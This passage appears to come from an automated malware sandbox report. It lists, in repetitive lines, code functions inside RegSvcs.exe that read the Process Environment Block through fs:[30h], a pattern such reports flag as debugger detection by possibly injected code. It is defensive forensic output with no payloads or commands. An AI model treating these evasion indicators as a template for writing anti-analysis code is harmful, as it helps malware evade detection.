                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C2582 mov ecx, dword ptr fs:[00000030h]14_2_019C2582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019E45B1 mov eax, dword ptr fs:[00000030h]14_2_019E45B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019E45B1 mov eax, dword ptr fs:[00000030h]14_2_019E45B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C65D0 mov eax, dword ptr fs:[00000030h]14_2_019C65D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FA5D0 mov eax, dword ptr fs:[00000030h]14_2_019FA5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FA5D0 mov eax, dword ptr fs:[00000030h]14_2_019FA5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FE5CF mov eax, dword ptr fs:[00000030h]14_2_019FE5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FE5CF mov eax, dword ptr fs:[00000030h]14_2_019FE5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FC5ED mov eax, dword ptr fs:[00000030h]14_2_019FC5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FC5ED mov eax, dword ptr fs:[00000030h]14_2_019FC5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019EE5E7 mov eax, dword ptr fs:[00000030h]14_2_019EE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019EE5E7 mov eax, dword ptr fs:[00000030h]14_2_019EE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019EE5E7 mov eax, dword ptr fs:[00000030h]14_2_019EE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019EE5E7 mov eax, dword ptr fs:[00000030h]14_2_019EE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019EE5E7 mov eax, dword ptr fs:[00000030h]14_2_019EE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019EE5E7 mov eax, dword ptr fs:[00000030h]14_2_019EE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019EE5E7 mov eax, dword ptr fs:[00000030h]14_2_019EE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019EE5E7 mov eax, dword ptr fs:[00000030h]14_2_019EE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C25E0 mov eax, dword ptr fs:[00000030h]14_2_019C25E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019EE53E mov eax, dword ptr fs:[00000030h]14_2_019EE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019EE53E mov eax, dword ptr fs:[00000030h]14_2_019EE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019EE53E mov eax, dword ptr fs:[00000030h]14_2_019EE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019EE53E mov eax, dword ptr fs:[00000030h]14_2_019EE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019EE53E mov eax, dword ptr fs:[00000030h]14_2_019EE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A56500 mov eax, dword ptr fs:[00000030h]14_2_01A56500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D0535 mov eax, dword ptr fs:[00000030h]14_2_019D0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D0535 mov eax, dword ptr fs:[00000030h]14_2_019D0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D0535 mov eax, dword ptr fs:[00000030h]14_2_019D0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D0535 mov eax, dword ptr fs:[00000030h]14_2_019D0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D0535 mov eax, dword ptr fs:[00000030h]14_2_019D0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D0535 mov eax, dword ptr fs:[00000030h]14_2_019D0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A94500 mov eax, dword ptr fs:[00000030h]14_2_01A94500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A94500 mov eax, dword ptr fs:[00000030h]14_2_01A94500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A94500 mov eax, dword ptr fs:[00000030h]14_2_01A94500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A94500 mov eax, dword ptr fs:[00000030h]14_2_01A94500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A94500 mov eax, dword ptr fs:[00000030h]14_2_01A94500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A94500 mov eax, dword ptr fs:[00000030h]14_2_01A94500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A94500 mov eax, dword ptr fs:[00000030h]14_2_01A94500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C8550 mov eax, dword ptr fs:[00000030h]14_2_019C8550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C8550 mov eax, dword ptr fs:[00000030h]14_2_019C8550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019F656A mov eax, dword ptr fs:[00000030h]14_2_019F656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019F656A mov eax, dword ptr fs:[00000030h]14_2_019F656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019F656A mov eax, dword ptr fs:[00000030h]14_2_019F656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A4A4B0 mov eax, dword ptr fs:[00000030h]14_2_01A4A4B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019F44B0 mov ecx, dword ptr fs:[00000030h]14_2_019F44B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C64AB mov eax, dword ptr fs:[00000030h]14_2_019C64AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A7A49A mov eax, dword ptr fs:[00000030h]14_2_01A7A49A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C04E5 mov ecx, dword ptr fs:[00000030h]14_2_019C04E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A46420 mov eax, dword ptr fs:[00000030h]14_2_01A46420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A46420 mov eax, dword ptr fs:[00000030h]14_2_01A46420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A46420 mov eax, dword ptr fs:[00000030h]14_2_01A46420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A46420 mov eax, dword ptr fs:[00000030h]14_2_01A46420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A46420 mov eax, dword ptr fs:[00000030h]14_2_01A46420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A46420 mov eax, dword ptr fs:[00000030h]14_2_01A46420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A46420 mov eax, dword ptr fs:[00000030h]14_2_01A46420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019F8402 mov eax, dword ptr fs:[00000030h]14_2_019F8402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019F8402 mov eax, dword ptr fs:[00000030h]14_2_019F8402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019F8402 mov eax, dword ptr fs:[00000030h]14_2_019F8402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FA430 mov eax, dword ptr fs:[00000030h]14_2_019FA430
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019BE420 mov eax, dword ptr fs:[00000030h]14_2_019BE420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019BE420 mov eax, dword ptr fs:[00000030h]14_2_019BE420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019BE420 mov eax, dword ptr fs:[00000030h]14_2_019BE420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019BC427 mov eax, dword ptr fs:[00000030h]14_2_019BC427
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019E245A mov eax, dword ptr fs:[00000030h]14_2_019E245A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A4C460 mov ecx, dword ptr fs:[00000030h]14_2_01A4C460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019B645D mov eax, dword ptr fs:[00000030h]14_2_019B645D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FE443 mov eax, dword ptr fs:[00000030h]14_2_019FE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FE443 mov eax, dword ptr fs:[00000030h]14_2_019FE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FE443 mov eax, dword ptr fs:[00000030h]14_2_019FE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FE443 mov eax, dword ptr fs:[00000030h]14_2_019FE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FE443 mov eax, dword ptr fs:[00000030h]14_2_019FE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FE443 mov eax, dword ptr fs:[00000030h]14_2_019FE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FE443 mov eax, dword ptr fs:[00000030h]14_2_019FE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FE443 mov eax, dword ptr fs:[00000030h]14_2_019FE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019EA470 mov eax, dword ptr fs:[00000030h]14_2_019EA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019EA470 mov eax, dword ptr fs:[00000030h]14_2_019EA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019EA470 mov eax, dword ptr fs:[00000030h]14_2_019EA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A7A456 mov eax, dword ptr fs:[00000030h]14_2_01A7A456
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A747A0 mov eax, dword ptr fs:[00000030h]14_2_01A747A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A6678E mov eax, dword ptr fs:[00000030h]14_2_01A6678E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C07AF mov eax, dword ptr fs:[00000030h]14_2_019C07AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A4E7E1 mov eax, dword ptr fs:[00000030h]14_2_01A4E7E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019CC7C0 mov eax, dword ptr fs:[00000030h]14_2_019CC7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C47FB mov eax, dword ptr fs:[00000030h]14_2_019C47FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C47FB mov eax, dword ptr fs:[00000030h]14_2_019C47FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A407C3 mov eax, dword ptr fs:[00000030h]14_2_01A407C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019E27ED mov eax, dword ptr fs:[00000030h]14_2_019E27ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019E27ED mov eax, dword ptr fs:[00000030h]14_2_019E27ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019E27ED mov eax, dword ptr fs:[00000030h]14_2_019E27ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C0710 mov eax, dword ptr fs:[00000030h]14_2_019C0710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019F0710 mov eax, dword ptr fs:[00000030h]14_2_019F0710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A3C730 mov eax, dword ptr fs:[00000030h]14_2_01A3C730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FC700 mov eax, dword ptr fs:[00000030h]14_2_019FC700
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019F273C mov eax, dword ptr fs:[00000030h]14_2_019F273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019F273C mov ecx, dword ptr fs:[00000030h]14_2_019F273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019F273C mov eax, dword ptr fs:[00000030h]14_2_019F273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FC720 mov eax, dword ptr fs:[00000030h]14_2_019FC720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FC720 mov eax, dword ptr fs:[00000030h]14_2_019FC720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C0750 mov eax, dword ptr fs:[00000030h]14_2_019C0750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019F674D mov esi, dword ptr fs:[00000030h]14_2_019F674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019F674D mov eax, dword ptr fs:[00000030h]14_2_019F674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019F674D mov eax, dword ptr fs:[00000030h]14_2_019F674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C8770 mov eax, dword ptr fs:[00000030h]14_2_019C8770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D0770 mov eax, dword ptr fs:[00000030h]14_2_019D0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D0770 mov eax, dword ptr fs:[00000030h]14_2_019D0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D0770 mov eax, dword ptr fs:[00000030h]14_2_019D0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D0770 mov eax, dword ptr fs:[00000030h]14_2_019D0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D0770 mov eax, dword ptr fs:[00000030h]14_2_019D0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D0770 mov eax, dword ptr fs:[00000030h]14_2_019D0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D0770 mov eax, dword ptr fs:[00000030h]14_2_019D0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D0770 mov eax, dword ptr fs:[00000030h]14_2_019D0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D0770 mov eax, dword ptr fs:[00000030h]14_2_019D0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D0770 mov eax, dword ptr fs:[00000030h]14_2_019D0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D0770 mov eax, dword ptr fs:[00000030h]14_2_019D0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D0770 mov eax, dword ptr fs:[00000030h]14_2_019D0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A02750 mov eax, dword ptr fs:[00000030h]14_2_01A02750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A02750 mov eax, dword ptr fs:[00000030h]14_2_01A02750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A44755 mov eax, dword ptr fs:[00000030h]14_2_01A44755
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A4E75D mov eax, dword ptr fs:[00000030h]14_2_01A4E75D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C4690 mov eax, dword ptr fs:[00000030h]14_2_019C4690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C4690 mov eax, dword ptr fs:[00000030h]14_2_019C4690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019F66B0 mov eax, dword ptr fs:[00000030h]14_2_019F66B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FC6A6 mov eax, dword ptr fs:[00000030h]14_2_019FC6A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A3E6F2 mov eax, dword ptr fs:[00000030h]14_2_01A3E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A3E6F2 mov eax, dword ptr fs:[00000030h]14_2_01A3E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A3E6F2 mov eax, dword ptr fs:[00000030h]14_2_01A3E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A3E6F2 mov eax, dword ptr fs:[00000030h]14_2_01A3E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A406F1 mov eax, dword ptr fs:[00000030h]14_2_01A406F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A406F1 mov eax, dword ptr fs:[00000030h]14_2_01A406F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FA6C7 mov ebx, dword ptr fs:[00000030h]14_2_019FA6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FA6C7 mov eax, dword ptr fs:[00000030h]14_2_019FA6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D260B mov eax, dword ptr fs:[00000030h]14_2_019D260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D260B mov eax, dword ptr fs:[00000030h]14_2_019D260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D260B mov eax, dword ptr fs:[00000030h]14_2_019D260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D260B mov eax, dword ptr fs:[00000030h]14_2_019D260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D260B mov eax, dword ptr fs:[00000030h]14_2_019D260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D260B mov eax, dword ptr fs:[00000030h]14_2_019D260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D260B mov eax, dword ptr fs:[00000030h]14_2_019D260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A3E609 mov eax, dword ptr fs:[00000030h]14_2_01A3E609
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C262C mov eax, dword ptr fs:[00000030h]14_2_019C262C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A02619 mov eax, dword ptr fs:[00000030h]14_2_01A02619
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019DE627 mov eax, dword ptr fs:[00000030h]14_2_019DE627
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019F6620 mov eax, dword ptr fs:[00000030h]14_2_019F6620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019F8620 mov eax, dword ptr fs:[00000030h]14_2_019F8620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A8866E mov eax, dword ptr fs:[00000030h]14_2_01A8866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A8866E mov eax, dword ptr fs:[00000030h]14_2_01A8866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019DC640 mov eax, dword ptr fs:[00000030h]14_2_019DC640
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019F2674 mov eax, dword ptr fs:[00000030h]14_2_019F2674
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FA660 mov eax, dword ptr fs:[00000030h]14_2_019FA660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FA660 mov eax, dword ptr fs:[00000030h]14_2_019FA660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A489B3 mov esi, dword ptr fs:[00000030h]14_2_01A489B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A489B3 mov eax, dword ptr fs:[00000030h]14_2_01A489B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A489B3 mov eax, dword ptr fs:[00000030h]14_2_01A489B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C09AD mov eax, dword ptr fs:[00000030h]14_2_019C09AD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C09AD mov eax, dword ptr fs:[00000030h]14_2_019C09AD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D29A0 mov eax, dword ptr fs:[00000030h]14_2_019D29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D29A0 mov eax, dword ptr fs:[00000030h]14_2_019D29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D29A0 mov eax, dword ptr fs:[00000030h]14_2_019D29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D29A0 mov eax, dword ptr fs:[00000030h]14_2_019D29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D29A0 mov eax, dword ptr fs:[00000030h]14_2_019D29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D29A0 mov eax, dword ptr fs:[00000030h]14_2_019D29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D29A0 mov eax, dword ptr fs:[00000030h]14_2_019D29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D29A0 mov eax, dword ptr fs:[00000030h]14_2_019D29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D29A0 mov eax, dword ptr fs:[00000030h]14_2_019D29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D29A0 mov eax, dword ptr fs:[00000030h]14_2_019D29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D29A0 mov eax, dword ptr fs:[00000030h]14_2_019D29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D29A0 mov eax, dword ptr fs:[00000030h]14_2_019D29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D29A0 mov eax, dword ptr fs:[00000030h]14_2_019D29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A4E9E0 mov eax, dword ptr fs:[00000030h]14_2_01A4E9E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019CA9D0 mov eax, dword ptr fs:[00000030h]14_2_019CA9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019CA9D0 mov eax, dword ptr fs:[00000030h]14_2_019CA9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019CA9D0 mov eax, dword ptr fs:[00000030h]14_2_019CA9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019CA9D0 mov eax, dword ptr fs:[00000030h]14_2_019CA9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019CA9D0 mov eax, dword ptr fs:[00000030h]14_2_019CA9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019CA9D0 mov eax, dword ptr fs:[00000030h]14_2_019CA9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019F49D0 mov eax, dword ptr fs:[00000030h]14_2_019F49D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A569C0 mov eax, dword ptr fs:[00000030h]14_2_01A569C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019F29F9 mov eax, dword ptr fs:[00000030h]14_2_019F29F9
